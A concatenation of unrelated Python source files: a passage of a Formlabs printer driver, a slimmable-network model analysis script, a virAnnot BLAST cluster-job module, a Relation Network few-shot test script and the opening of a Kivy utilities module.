excluding start_xy_mm and including end_xy_mm,
possibly including samples along the way.
"""
import FLP
from numpy.linalg import norm
dist_mm = norm(np.asarray(end_xy_mm) - start_xy_mm)
if dist_mm <= max_mm:
if mW is None:
return np.array((tuple(end_xy_mm) + (dt_s,),)) # Just the end sample.
else:
return np.array((tuple(end_xy_mm) + (dt_s, mW),)) # Just the end sample.
samples_s = np.linspace(0, dt_s, np.ceil(dist_mm / max_mm) + 1)
timeRange_s = (0, dt_s)
if mW is None:
return np.transpose([np.interp(samples_s[1:], timeRange_s, (start_xy_mm[0], end_xy_mm[0])),
np.interp(samples_s[1:], timeRange_s, (start_xy_mm[1], end_xy_mm[1])),
np.diff(samples_s)])
else:
return np.transpose([np.interp(samples_s[1:], timeRange_s, (start_xy_mm[0], end_xy_mm[0])),
np.interp(samples_s[1:], timeRange_s, (start_xy_mm[1], end_xy_mm[1])),
np.diff(samples_s),
mW * np.ones_like(samples_s[1:])])
@staticmethod
def sample_line_segments_mm_s(start_xy_mm, xys_mm, dts_s, mWs, max_mm=5.0):
""" Given a sequence of x, y, dt, mW, return a new sequence
with samples added as needed for interpolation.
"""
if len(xys_mm) != len(dts_s) or len(xys_mm) != len(mWs):
raise TypeError('Samples must be the same length.')
if len(xys_mm) == 0:
return np.zeros((0, 3))
result = [Printer.sample_line_segment_mm_s(start_xy_mm,
xys_mm[0],
dts_s[0],
mW=mWs[0],
max_mm=max_mm)]
for start_mm, end_mm, dt_s, mW in zip(xys_mm[:-1],
xys_mm[1:],
dts_s[1:],
mWs[1:]):
newChunk = Printer.sample_line_segment_mm_s(start_mm,
end_mm,
dt_s,
mW=mW,
max_mm=max_mm)
result.append(newChunk)
return np.vstack(result)
def samples_to_FLP(self, xy_mm_dts_s_mW, max_mm=5.0):
import FLP
clock_Hz = FLP.XYMoveClockRate.moverate_Hz()
xyticks = []
import numpy as np
xy_mm_dts_s_mW = np.asarray(xy_mm_dts_s_mW)
result = FLP.Packets()
xydtmW = self.sample_line_segments_mm_s(start_xy_mm=xy_mm_dts_s_mW[0,:2],
xys_mm=xy_mm_dts_s_mW[1:,:2],
dts_s=xy_mm_dts_s_mW[1:,2],
mWs=xy_mm_dts_s_mW[1:,3],
max_mm=5.0)
# Use the starting row, then interpolate elsewhere.
xydtmW = np.vstack([xy_mm_dts_s_mW[:1],
np.hstack([xydtmW[:,:2], xydtmW[:,2:3], xydtmW[:,3:4]])
])
last_mW = None
lastxy_ticks = self.mm_to_galvo(xydtmW[0][0], xydtmW[0][1])
for x_mm, y_mm, dt_s, mW in xydtmW:
if mW != last_mW:
if xyticks:
result.append(FLP.XYMove(xyticks))
xyticks = []
result.append(FLP.LaserPowerLevel(self.mW_to_ticks(mW)))
last_mW = mW
xy_ticks = self.mm_to_galvo(x_mm, y_mm)
dt_ticks = dt_s * clock_Hz
# Deal with potential that the move takes too long to fit in one step:
for i in range(int(dt_ticks // 0xffff)):
alpha = (i+1) * 0xffff / dt_ticks
x = np.interp(alpha, [0.0, 1.0], [lastxy_ticks[0], xy_ticks[0]])
y = np.interp(alpha, [0.0, 1.0], [lastxy_ticks[1], xy_ticks[1]])
xyticks.append((x, y, 0xffff))
dt_ticks %= 0xffff # Now we just have to do the last little bit.
xyticks.append(tuple(xy_ticks) + (dt_ticks,))
lastxy_ticks = xy_ticks
if xyticks:
result.append(FLP.XYMove(xyticks))
return result
@staticmethod
def mm_to_galvo_approx(x, y=None):
""" Given one or many points in mm space, map them to galvo space.
e.g.,
>>> Printer.mm_to_galvo(0, 0) # -> galvo ticks for middle of build area.
>>> Printer.mm_to_galvo([[0, 1, 2], [0, 0, 0]]) # -> A three-segment line along the x axis.
"""
xy = x
if y is not None:
if np.shape(x) != np.shape(y):
raise TypeError('x and y shapes must match. Got x.shape: {}, y.shape: {}'.format(np.shape(x), np.shape(y)))
xy = np.array([x, y]) # Allows calling with just an x and a y.
# These polynomials are a fit to all Form 1/1+s.
Px = np.array([ 3.27685507e+04, 4.80948842e+02, -1.22079970e-01,
-2.88953161e-03, 6.08478254e-01, -8.81889894e-02,
-2.20922460e-05, 4.41734858e-07, 6.76006698e-03,
-1.02093319e-05, -1.43020804e-06, 2.03140758e-08,
-6.71090318e-06, -4.36026159e-07, 2.62988209e-08,
8.32187652e-11])
Py = np.array([ 3.27661362e+04, 5.69452975e-01, -2.39793282e-03,
9.83778919e-06, 4.79035581e+02, -8.13031539e-02,
-2.66499770e-03, -4.40219799e-07, -1.06247442e-01,
5.18419181e-05, 1.47754740e-06, -1.60049118e-09,
-2.44473912e-03, -1.31398011e-06, 1.83452740e-08,
3.16943985e-10])
xy = np.asarray(xy, dtype=float)
if xy.shape[0] != 2:
raise TypeError('xy must be a two-vector or 2xn or 2xmxn... not shape {}.'.format(xy.shape))
shp = xy.shape[1:] # polyval2d wants vector inputs, not multidimensional.
return np.array([polyval2d(P, *xy.reshape(2,-1)).reshape(shp) for P in (Px, Py)])
def polyval2d(m, x, y):
""" From http://stackoverflow.com/a/7997925/874660
"""
import itertools
order = int(np.sqrt(len(m))) - 1
ij = itertools.product(range(order+1), range(order+1))
z = np.zeros_like(x)
for a, (i,j) in zip(m, ij):
z += a * x**i * y**j
return z
################################################################################
class DummyPrinter(Printer):
""" DummyPrinter lets you test some functionality without a printer connected.
"""
def __init__(self):
super(DummyPrinter, self).__init__(connect=False)
self._laser_xypower = [0, 0, 0]
self._blocks = dict()
self._state = State.MACHINE_OFF
def poll(self):
raise NotImplementedError()
def initialize(self):
self._state = State.MACHINE_READY_TO_PRINT
self._zpos_usteps = 0 # FIXME: Need to know where z starts.
self._zcurrent = 40
self._zspeed_usteps_per_s = 0
self._tiltpos_usteps = 0
self._tiltcurrent = 40
self._tiltspeed_usteps_per_s = 0
def shutdown(self):
self._state = State.MACHINE_OFF
def list_blocks(self):
return self._blocks.keys()
def delete_block(self, block, end=None):
if end is None:
end = block
for i in range(block, end+1):
if i in self._blocks:
del self._blocks[i]
def read_block_raw(self, block):
return self._blocks[block]
def block_size(self):
return len(self._blocks[block])
def _command(self, cmd, payload=b'', wait=True, expect_success=False):
header = struct.Struct('<III')
block, length, checksum = header.unpack(payload[:header.size])
if cmd == Command.CMD_LOAD_PRINT_DATA_BLOCK:
data = payload[header.size:]
assert len(data) == length
self._blocks[block] = data
elif cmd == Command.CMD_MACHINE_STATE:
return self._state
elif cmd == Command.CMD_MOVE_Z_STEPPER_INCREMENTAL:
s = struct.Struct('<iIB')
steps, feedrate, current = s.unpack(payload[header.size:])
self._zpos_usteps += steps
self._zspeed_usteps_per_s = feedrate
def set_laser_uint16(self, x, y, power=25000):
""" Sets the position and laser power level
x and y are unsigned 16-bit values (0 to 0xffff)
(with 0 at the corner of the platform)
power is an unsigned 16-bit integer
Setting power too high can damage your diode!
"""
if self.AUDIT_LASER_POWER:
# This raises if the power is too high:
self.check_laser_ticks(power)
self._laser_xypower = [x, y, power]
def read_laser_table(self):
return np.array([[0, 0, 0], [0.0, 0.0, 1.0], [0.1, 0.01, 2.0], [0.2, 0.01, 2.0], [0.3, 0.02, 3.0], [0.4, 0.02, 4.0], [0.5, 0.03, 6.0], [0.6, 0.03, 7.0], [0.7, 0.04, 8.0], [0.8, 0.06, 10.0], [0.9, 0.11, 12.0], [1.0, 1.16, 40.0], [1.1, 5.27, 144.0], [1.2, 9.37, 239.0], [1.3, 13.42, 339.0], [1.4, 17.68, 441.0], [1.5, 21.91, 543.0], [1.6, 26.08, 645.0], [1.7, 30.48, 747.0], [1.8, 34.73, 853.0], [1.9, 38.86, 958.0], [2.0, 43.18, 1061.0], [2.1, 47.67, 1169.0], [2.2, 51.93, 1276.0], [2.3, 56.1, 1381.0], [2.4, 60.61, 1489.0], [2.5, 65.06, 1589.0], [2.6, 69.01, 1702.0], [2.7, 73.45, 1798.0], [2.8, 77.69, 1907.0], [2.9, 82.51, 2021.0]])
def read_grid_table(self):
return np.array([[[ 2302, 2736], [ 2251, 17532], [ 2141, 32820], [ 1972, 47937], [ 1757, 62382]],
[[16833, 2212], [16744, 17245], [16608, 32800], [16420, 48168], [16207, 62848]],
[[32294, 2003], [32182, 17099], [32026, 32748], [31840, 48228], [31621, 62979]],
[[47858, 2131], [47740, 17142], [47592, 32705], [47406, 48093], [47146, 62737]],
[[62745, 2589], [62624, 17351], [62469, 32651], [62258, 47773], [62017, 62194]]])
################################################################################
from enum import Enum
class Response(Enum):
""" Response codes returned by many commands
"""
SUCCESS = 0
ERROR_MALFORMED_REQUEST = 0x01
ERROR_OUT_OF_MEMORY = 0x02
ERROR_CRC_ERROR = 0x03
ERROR_INPUT_VOLTAGE_TOO_LOW = 0x04
ERROR_INPUT_VOLTAGE_TOO_HIGH = 0x05
ERROR_COVER_OPEN = 0x06
ERROR_PAUSE_BUTTON_PRESSED = 0x07
ERROR_TIMEOUT_ON_Z_STEPPER_HOME = 0x08
ERROR_ALREADY_PRINTING = 0x09
ERROR_FAT = 0x10
ERROR_COVER_CLOSE = 0x11
STATUS_PRINT_STOPPED_DUE_TO_STOP = 0x12
STATUS_PRINT_STOPPED_DUE_TO_ABORT = 0x13
ERROR_NOT_PRINTING = 0x14
STATUS_PRINTING_RESUMED_FROM_PAUSE = 0x15
ERROR_INVALID_JOB = 0x16
ERROR_SERIAL_WRITE_UNSUCCESSFUL = 0x17
ERROR_INVALID_BLOCK_NUMBER = 0x18
ERROR_PRINTER_OFF = 0x19
ERROR_INVALID_MEMORY_ADDRESS = 0x1A
ERROR_JOB_ALREADY_RUNNING = 0x1B
ERROR_SD_CARD = 0x1C
ERROR_LASER_ALREADY_CALIBRATING = 0x1D
ERROR_FILE_NOT_FOUND = 0x1E
ERROR_FILE_ALREADY_EXISTS = 0x1F
ERROR_NOT_A_DIRECTORY = 0x20
ERROR_NOT_A_FILE = 0x21
ERROR_FILE_ERROR = 0x22
ERROR_UNIMPLEMENTED = 0x97
ERROR_MISC = 0x98
ERROR_USB_TIMEOUT = 0x99
class Command(Enum):
""" Big list of commands
"""
CMD_MACHINE_INFORMATION = 0x01
CMD_INITIALIZE = 0x02
CMD_SHUTDOWN = 0x03
CMD_SET_TIME = 0x04
CMD_DROP_TO_BOOTLOADER = 0x05
CMD_PRINTER_STATUS = 0x06
CMD_MACHINE_STATE = 0x07
CMD_REQUIRED_PREFORM_VERSION = 0x08
CMD_READ_CPU_INFORMATION = 0x09
CMD_JOB_START = 0x10
CMD_JOB_LOAD_BLOCK = 0x11
CMD_JOB_INFORMATION = 0x12
CMD_JOB_STOP = 0x13
CMD_LOAD_PRINT_DATA_BLOCK = 0x20
CMD_START_PRINTING = 0x21
CMD_BLOCK_INFORMATION = 0x22
CMD_DELETE_BLOCKS = 0x23
CMD_LIST_BLOCKS = 0x24
CMD_STOP_PRINTING = 0x25
CMD_PAUSE_PRINTING = 0x26
CMD_UNPAUSE_PRINTING = 0x27
CMD_READ_BLOCK = 0x28
CMD_READ_BLOCK_DATA = 0x29
CMD_FORMAT_SDCARD = 0x2A
CMD_MOVE_Z_STEPPER_INCREMENTAL = 0x30
CMD_MOVE_TILT_STEPPER_INCREMENTAL = 0x31
CMD_POSITION_LASER = 0x32
CMD_MOVE_Z_STEPPER_TO_LIMIT_SWITCH = 0x33
CMD_READ_LASER_TABLE = 0x44
CMD_READ_GRID_TABLE = 0x45
CMD_READ_ZSENSOR_HEIGHT = 0x46
CMD_WRITE_DIO = 0x50
CMD_READ_DIO = 0x51
CMD_READ_ADC_INPUT = 0x52
CMD_INIT_SD_STORAGE = 0x60
CMD_CLOSE_SD_STORAGE = 0x61
CMD_READ_FILE = 0x62
CMD_WRITE_FILE = 0x63
CMD_DELETE_FILE = 0x64
CMD_CREATE_DIRECTORY = 0x65
CMD_READ_DIRECTORY = 0x67
CMD_DELETE_DIRECTORY = 0x66
CMD_GET_FILE_INFORMATION = 0x68
STATUS_LAYER_DONE = 0x80
STATUS_LAYER_NON_FATAL_ERROR = 0x81
STATUS_BLOCK_DONE = 0x84
STATUS_PRINT_DONE = 0x82
DEBUG_STRING = 0x90
class State(Enum):
MACHINE_OFF = 0
MACHINE_POWERING_UP = 1
MACHINE_RAISING_PLATFORM = 2
MACHINE_READY_TO_PRINT = 3
MACHINE_PRINTING = 4
MACHINE_PRINTING_PAUSE_PENDING = 5
MACHINE_PRINTING_PAUSED = 6
MACHINE_STOPPING_PRINT = 7
MACHINE_SHUTTING_DOWN = 8
MACHINE_ERROR = 9
MACHINE_HARD_ERROR = 10
MACHINE_STATE_NONE = 11
if __name__ == '__main__':
FLP.print_not_a_script_message_and_exit()
|
<reponame>jsiloto/adaptive-cob
import argparse
import datetime
import time
import os
import sys
import numpy as np
import torch
from torch import nn
from models import load_ckpt, get_model, save_ckpt
from myutils.common import file_util, yaml_util
from utils import data_util, main_util, misc_util
from models.slimmable.slimmable_ops import USConv2d, USBatchNorm2d, USConv2dStaticSamePadding
from models.mimic.base import set_width
from ptflops import get_model_complexity_info
from myutils.pytorch import func_util, module_util
from analyzer.hooks import usconv_flops_counter_hook, bn_flops_counter_hook
from analyzer.encoder import full_encoder
from analyzer.analysis import hide_prints
import warnings
from analyzer.analysis import model_analysis
import os
from os import listdir
from os.path import isfile, join
import pandas as pd
from pathlib import Path
def get_argparser():
argparser = argparse.ArgumentParser(description='Mimic Runner')
argparser.add_argument('--config', required=False, help='yaml file path')
argparser.add_argument('--dir', required=False, help='yaml file path')
argparser.add_argument('--device', default='cuda', help='device')
argparser.add_argument('-debug', action='store_true', help='')
return argparser
def summarize(results):
size = results['input_size']
jpeg_size = results["jpeg_size"]
macs_encoder = results['macs_base_encoder']+ results['macs_compressor']
params_encoder = results['params_base_encoder'] + results['params_compressor']
macs_full = results["macs_decoder"] + macs_encoder
params_full = results["params_decoder"] + params_encoder
print("{}: input shape ({} Bytes)".format((1, 3, size, size), size * size * 3))
print("{}: output shape".format(results['output_shape']))
print("{} Encoder Bytes {:.2f}%: Compression".format(np.prod(results["output_shape"]), results["compression"] * 100))
print("{} JPEG Bytes {:.2f}%: JPEG 95 Compression".format(jpeg_size, results["jpeg_compression"] * 100))
print("{:<30} {:.1f} GMacs {:.1f}k params".format("Base Encoder:", results['macs_base_encoder'] / 1e9, results['params_base_encoder']/ 1e3))
print("{:<30} {:.1f} GMacs {:.1f}k params".format("Compression Encoder:", results['macs_compressor'] / 1e9, results['params_compressor'] / 1e3))
print('{:<30} {:.1f} GMacs {:.1f}k params'.format('Full Encoder: ',macs_encoder/1e9, params_encoder/ 1e3))
print('{:<30} {:.1f} GMacs {:.1f}k params'.format('Decoder: ', results["macs_decoder"]/ 1e9,results["params_decoder"] / 1e3))
print('{:<30} {:.1f} GMacs {:.1f}k params'.format('Full Model: ', macs_full / 1e9, params_full / 1e3))
def main(args):
assert not (args.config and args.dir)
if args.config:
print(args.config)
config = yaml_util.load_yaml_file(args.config)
width_list = [1.0]
if 'slimmable' in config['student_model']['backbone']['params']:
width_list = config['student_model']['backbone']['params']['width_mult_list']
results = model_analysis(config, args.device, setting='Teacher', debug=False)
print("************** Teacher *************")
summarize(results)
print("************** Student *************")
for width in width_list:
results = model_analysis(config, args.device, setting=width, debug=False)
summarize(results)
elif "dir" in args:
result_dir = join(args.dir, "results")
Path(result_dir).mkdir(parents=True, exist_ok=True)
config_file_list = [f for f in listdir(args.dir) if isfile(join(args.dir, f))]
config_file_list = [f for f in config_file_list if f.endswith('.yaml')]
for config_file in config_file_list:
result_file = join(result_dir, config_file).split('.yaml')[0] + ".csv"
config_file = join(args.dir, config_file)
print("#################################################################################")
print("config_file: {},".format(config_file))
print("result_file: {},".format(result_file))
# Build Model
config = yaml_util.load_yaml_file(config_file)
student_model_config = config['student_model']
# student_model = get_model(student_model_config, device, strict=False)
# encoder = full_encoder(student_model, student_model_config)
if isfile(result_file):
df = pd.read_csv(result_file)
df = df.loc[:, ~df.columns.str.match("Unnamed")]
df.reset_index()
df.set_index("Setting")
else:
continue
new_df = []
for index, row in df.iterrows():
setting = row['Setting']
results = model_analysis(config, args.device, setting=setting, debug=args.debug)
# attempts = 0
# while attempts < 3:
# try:
# results = model_analysis(config, device, setting=setting, debug=False)
# break
# except RuntimeError as e:
# attempts += 1
# print("{}".format(e.args))
results.update(row.to_dict())
new_df.append(results)
new_df = pd.DataFrame(new_df)
new_df.reset_index()
new_df.set_index("Setting")
new_df.to_csv(result_file)
if __name__ == '__main__':
parser = get_argparser()
main(parser.parse_args())
|
<reponame>marieBvr/virAnnot
# to allow code to work with Python 2 and 3
from __future__ import print_function # print is a function in python3
from __future__ import unicode_literals # avoid adding "u" to each string
from __future__ import division # avoid writing float(x) when dividing by x
import os.path
import logging as log
import random
import string
from Bio import SeqIO
from Blast import Blast
class Rps2blast:
"""
This module is part of virAnnot module
This will select viral sequences from RPS results and
run Blast on these sequences only.
"""
def __init__(self, args):
self.execution = 1
self.check_args(args)
bcontigfile = os.getcwd() + '/' +str(args['sample']) + '/' + args['bcontigs']
if not os.path.exists(bcontigfile):
self.csv_to_fasta()
self.cmd = []
self.ssh_cmd = []
if self.execution == 1:
Blast.create_cmd(self)
def csv_to_fasta(self):
"""
From rps csv results
extract query id and generate fasta file
"""
fasta_file = self.icontigs # Input fasta file
wanted_file = self.i # Input interesting sequence IDs
result_file = self.bcontigs # Output fasta file
wanted = set()
with open(wanted_file) as f:
for line in f:
query_id = line.strip().split("\t")[0]
query_length = line.strip().split("\t")[1]
if query_length != "no_hit":
wanted.add(query_id.replace("\"", "") )
fasta_sequences = SeqIO.parse(open(fasta_file),'fasta')
with open(result_file, "w") as f:
for seq in fasta_sequences:
if seq.id in wanted:
SeqIO.write([seq], f, "fasta")
def get_exec_script(self):
#
# Set cluster environment and launch blast_launch.py
# For genouest cluster, need an additional file
#
ssh_cmd = ''
if self.server != 'enki':
ssh_cmd += 'if [ -f ~/.bashrc ]; then' + "\n"
ssh_cmd += 'source ~/.bashrc' + "\n"
ssh_cmd += 'echo bashrc loaded' + "\n"
ssh_cmd += 'elif [ -f ~/.profile ]; then' + "\n"
ssh_cmd += 'source ~/.profile' + "\n"
ssh_cmd += 'echo profile loaded' + "\n"
ssh_cmd += 'elif [ -f ~/.bash_profile ]; then' + "\n"
ssh_cmd += 'source /etc/profile' + "\n"
ssh_cmd += 'source ~/.bash_profile' + "\n"
ssh_cmd += 'echo bash_profile loaded' + "\n"
ssh_cmd += 'else' + "\n"
ssh_cmd += 'echo "source not found."' + "\n"
ssh_cmd += 'fi' + "\n"
ssh_cmd += 'cd ' + self.params['servers'][self.server]['scratch'] + "\n"
ssh_cmd += 'mkdir ' + self.params['servers'][self.server]['scratch'] + '/' + self.out_dir + "\n"
ssh_cmd += 'mv ' + self.params['servers'][self.server]['scratch'] + '/' + os.path.basename(self.contigs) + ' ' + self.out_dir + "\n"
if self.server == 'genouest':
ssh_cmd += 'mv ' + self.params['servers'][self.server]['scratch'] + '/' + os.path.basename(self.genouest_cmd_file) + ' ' + self.out_dir + "\n"
ssh_cmd += 'cd ' + self.params['servers'][self.server]['scratch'] + '/' + self.out_dir + "\n"
if self.server == 'genouest':
self.create_genouest_script()
ssh_cmd += 'sbatch ' + self.params['servers'][self.server]['scratch'] + '/' + self.out_dir
ssh_cmd += '/' + os.path.basename(self.genouest_cmd_file)
else:
if self.server == "genologin":
ssh_cmd += 'sbatch --mem=2G '
ssh_cmd += 'blast_launch.py -c ' + self.server + ' -n ' + self.num_chunk + ' --n_cpu 8 --tc ' + self.tc
ssh_cmd += ' -d ' + self.params['servers'][self.server]['db'][self.db]
if self.server != 'enki':
ssh_cmd += ' -s ' + os.path.basename(self.contigs)
else:
ssh_cmd += ' -s ' + self.contigs
ssh_cmd += ' --prefix ' + self.out_dir
ssh_cmd += ' -p ' + self.type + ' -o ' + os.path.basename(self.out) + ' -r ' + ' --outfmt 5'
ssh_cmd += ' --max_target_seqs ' + self.max_target_seqs
return ssh_cmd
def create_genouest_script(self):
Blast.create_genouest_script(self)
def check_args(self, args=dict):
"""
Check if arguments are valid
"""
if 'sample' in args:
self.sample = str(args['sample'])
self.wd = os.getcwd() + '/' + self.sample
accepted_type = ['tblastx', 'blastx', 'blastn', 'blastp']
if 'i' in args:
if os.path.exists(self.wd + '/' + args['i']):
self.i = self.wd + '/' + args['i']
self.execution = 1
else:
self.execution = 0
log.critical('Input file do not exists.')
if 'icontigs' in args:
self.icontigs = self.wd + '/' + args['icontigs']
else:
self.icontigs = self.wd + '/' + self.sample + "_idba.scaffold.fa"
if 'bcontigs' in args:
self.bcontigs = self.wd + '/' + args['bcontigs']
else:
self.bcontigs = self.wd + '/' + self.sample + "_idba.scaffold.rps2bltx.fa"
self.contigs = self.bcontigs
if 'type' in args:
if args['type'] in accepted_type:
self.type = args['type']
else:
log.critical('Wrong blast type. ' + accepted_type)
else:
log.critical('Blast type is mandatory.')
if 'n_cpu' in args:
self.n_cpu = str(args['n_cpu'])
else:
log.debug('n_cpu option not found. default 1')
self.n_cpu = '1'
if 'sge' in args:
self.sge = bool(args['sge'])
else:
self.sge = False
if 'tc' in args:
self.tc = str(args['tc'])
else:
self.tc = '5'
if 'max_target_seqs' in args:
self.max_target_seqs = str(args['max_target_seqs'])
else:
self.max_target_seqs = '5'
if 'num_chunk' in args:
self.num_chunk = str(args['num_chunk'])
else:
self.num_chunk = '100'
if 'out' in args:
self.out = args['out']
if 'params' in args:
self.params = args['params']
if 'server' in args:
self.server = args['server']
if 'username' in args['params']['servers'][self.server]:
self.username = args['params']['servers'][self.server]['username']
else:
log.critical('No username defined for cluster.')
if 'db' in args:
if args['db'] not in self.params['servers'][self.server]['db']:
log.critical(args['db'] + ' not defined in parameters file')
else:
self.db = args['db']
else:
log.critical('You must provide a database name.')
self.cmd_file = self.wd + '/' + self.sample + '_' + self.type + '_' + self.db + '_rps2blast_cmd.txt'
self.remote_cmd_file = self.wd + '/' + self.sample + '_' + self.type + '_' + self.db + '_remote_rps2blast_cmd.txt'
self.genouest_cmd_file = self.wd + '/' + self.sample + '_' + self.type + '_' + self.db + '_genouest_rps2blast_cmd.txt'
self.random_string = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(4))
self.out_dir = self.random_string + '_' + self.sample + '_' + self.type
|
# -------------------------------------
# Project: Learning to Compare: Relation Network for Few-Shot Learning
# Date: 2017.9.21
# Author: <NAME>
# All Rights Reserved
# -------------------------------------
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.optim.lr_scheduler import StepLR
import numpy as np
import task_generator_test as tg
import os
import math
import argparse
import scipy as sp
import scipy.stats
parser = argparse.ArgumentParser(description="One Shot Visual Recognition")
parser.add_argument("-f", "--feature_dim", type=int, default=64)
parser.add_argument("-r", "--relation_dim", type=int, default=8)
parser.add_argument("-w", "--class_num", type=int, default=5)
parser.add_argument("-s", "--sample_num_per_class", type=int, default=5)
parser.add_argument("-b", "--batch_num_per_class", type=int, default=10)
parser.add_argument("-e", "--episode", type=int, default=10)
parser.add_argument("-t", "--test_episode", type=int, default=600)
parser.add_argument("-l", "--learning_rate", type=float, default=0.001)
parser.add_argument("-g", "--gpu", type=int, default=0)
parser.add_argument("-u", "--hidden_unit", type=int, default=10)
parser.add_argument("-exp", "--exp_date", type=str, default="200325-1718")
args = parser.parse_args()
# Hyper Parameters
FEATURE_DIM = args.feature_dim
RELATION_DIM = args.relation_dim
CLASS_NUM = args.class_num
SAMPLE_NUM_PER_CLASS = args.sample_num_per_class
BATCH_NUM_PER_CLASS = args.batch_num_per_class
EPISODE = args.episode
TEST_EPISODE = args.test_episode
LEARNING_RATE = args.learning_rate
GPU = args.gpu
HIDDEN_UNIT = args.hidden_unit
EXP_DATE = args.exp_date
def mean_confidence_interval(data, confidence=0.95):
a = 1.0 * np.array(data)
n = len(a)
m, se = np.mean(a), scipy.stats.sem(a)
h = se * sp.stats.t._ppf((1 + confidence) / 2., n - 1)
return m, h
class CNNEncoder(nn.Module):
"""docstring for ClassName"""
def __init__(self):
super(CNNEncoder, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=3, padding=0),
nn.BatchNorm2d(64, momentum=1, affine=True),
nn.ReLU(),
nn.MaxPool2d(2))
self.layer2 = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, padding=0),
nn.BatchNorm2d(64, momentum=1, affine=True),
nn.ReLU(),
nn.MaxPool2d(2))
self.layer3 = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, padding=1),
nn.BatchNorm2d(64, momentum=1, affine=True),
nn.ReLU())
self.layer4 = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, padding=1),
nn.BatchNorm2d(64, momentum=1, affine=True),
nn.ReLU())
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
# out = out.view(out.size(0),-1)
return out # 64
class RelationNetwork(nn.Module):
"""docstring for RelationNetwork"""
def __init__(self, input_size, hidden_size):
super(RelationNetwork, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(64 * 2, 64, kernel_size=3, padding=0),
nn.BatchNorm2d(64, momentum=1, affine=True),
nn.ReLU(),
nn.MaxPool2d(2))
self.layer2 = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, padding=0),
nn.BatchNorm2d(64, momentum=1, affine=True),
nn.ReLU(),
nn.MaxPool2d(2))
self.fc1 = nn.Linear(input_size * 3 * 3, hidden_size)
self.fc2 = nn.Linear(hidden_size, 1)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = out.view(out.size(0), -1)
out = F.relu(self.fc1(out))
# out = F.sigmoid(self.fc2(out)) # Deprecated
out = torch.sigmoid(self.fc2(out))
return out
def main():
# Step 1: init data folders
print("init data folders")
# init character folders for dataset construction
metatrain_folders, metatest_folders = tg.mini_imagenet_folders()
# Step 2: init neural networks
print("init neural networks")
feature_encoder = CNNEncoder()
relation_network = RelationNetwork(FEATURE_DIM, RELATION_DIM)
feature_encoder.cuda(GPU)
relation_network.cuda(GPU)
feature_encoder_fn = os.path.join('./models', "{}_miniimagenet_feature_encoder_{}way_{}shot.pkl".format(
EXP_DATE, CLASS_NUM, SAMPLE_NUM_PER_CLASS))
relation_network_fn = os.path.join('./models', "{}_miniimagenet_relation_network_{}way_{}shot.pkl".format(
EXP_DATE, CLASS_NUM, SAMPLE_NUM_PER_CLASS))
if os.path.exists(feature_encoder_fn):
feature_encoder.load_state_dict(torch.load(feature_encoder_fn))
print("load feature encoder success")
if os.path.exists(relation_network_fn):
relation_network.load_state_dict(torch.load(relation_network_fn))
print("load relation network success")
total_accuracy = 0.0
for episode in range(EPISODE):
# test
print("Episode-{}\tTesting...".format(episode), end='\t')
accuracies = []
for i in range(TEST_EPISODE):
total_rewards = 0
task = tg.MiniImagenetTask(metatest_folders, CLASS_NUM, SAMPLE_NUM_PER_CLASS, 15) # test_dir, 5, 5, 15(test_num))
sample_dataloader = tg.get_mini_imagenet_data_loader(task, num_per_class=SAMPLE_NUM_PER_CLASS,
split="train", shuffle=False)
num_per_class = 5
test_dataloader = tg.get_mini_imagenet_data_loader(task, num_per_class=num_per_class, split="test",
shuffle=False)
sample_images, sample_labels = sample_dataloader.__iter__().next()
for test_images, test_labels in test_dataloader:
batch_size = test_labels.shape[0]
print(test_labels)
# print(test_images.size())
# calculate features
sample_features = feature_encoder(Variable(sample_images).cuda(GPU)) # [25, 64, 19, 19]
# print('sample feature(1): ', sample_features.size())
sample_features = sample_features.view(CLASS_NUM, SAMPLE_NUM_PER_CLASS, FEATURE_DIM, 19, 19) # [5, 5, 64, 19, 19]
# print('sample feature(2): ', sample_features.size())
sample_features = torch.sum(sample_features, 1).squeeze(1) # [5, 64, 19, 19]
# print('sample feature(3): ', sample_features.size())
test_features = feature_encoder(Variable(test_images).cuda(GPU)) # [25, 64, 19, 19]
# print('test_features(1): ', test_features.size())
# calculate relations
# each batch sample link to every samples to calculate relations
# to form a 100x128 matrix for relation network
sample_features_ext = sample_features.unsqueeze(0).repeat(batch_size, 1, 1, 1, 1) # [25, 5, 64, 19, 19]
# print('sample feature(4): ', sample_features_ext.size())
test_features_ext = test_features.unsqueeze(0) # [1, 25, 64, 19, 19]
# print('test_features(2): ', test_features_ext.size())
test_features_ext = test_features_ext.repeat(1 * CLASS_NUM, 1, 1, 1, 1) # [5, 25, 64, 19, 19]
# print('test_features(3): ', test_features_ext.size())
test_features_ext = torch.transpose(test_features_ext, 0, 1) # [25, 5, 64, 19, 19]
# print('test_features(4): ', test_features_ext.size())
relation_pairs = torch.cat((sample_features_ext, test_features_ext), 2) # [25, 5, 128, 19, 19]
# print('relation_pairs(1): ', relation_pairs.size())
relation_pairs = relation_pairs.view(-1, FEATURE_DIM * 2, 19, 19) # [125, 128, 19, 19]
# print('relation_pairs(2): ', relation_pairs.size())
relations = relation_network(relation_pairs) # [125, 1]
# print('relations(1): ', relations.size())
relations = relations.view(-1, CLASS_NUM) # [25, 5]
# print('relations(2): ', relations.size())
print(relations.data)
rel_score = relations.detach().cpu().numpy()
print(rel_score)
_, predict_labels = torch.max(relations.data, 1)
print(predict_labels)
exit()
test_labels = test_labels.cuda(GPU)
rewards = [1 if predict_labels[j] == test_labels[j] else 0 for j in range(batch_size)]
total_rewards += np.sum(rewards)
accuracy = total_rewards / 1.0 / CLASS_NUM / 15
accuracies.append(accuracy)
test_accuracy, h = mean_confidence_interval(accuracies)
print("test accuracy:{:.4f}\th:{:.3f}".format(test_accuracy, h))
total_accuracy += test_accuracy
print("aver_accuracy: {:.4f}".format(total_accuracy / EPISODE))
if __name__ == '__main__':
main()
|
'''Utilities
=============
'''
from kivy.compat import PY2
from kivy.utils import get_color_from_hex
from kivy.properties import StringProperty, ObservableDict, ObservableList
from kivy.factory import Factory
from kivy.event import EventDispatcher
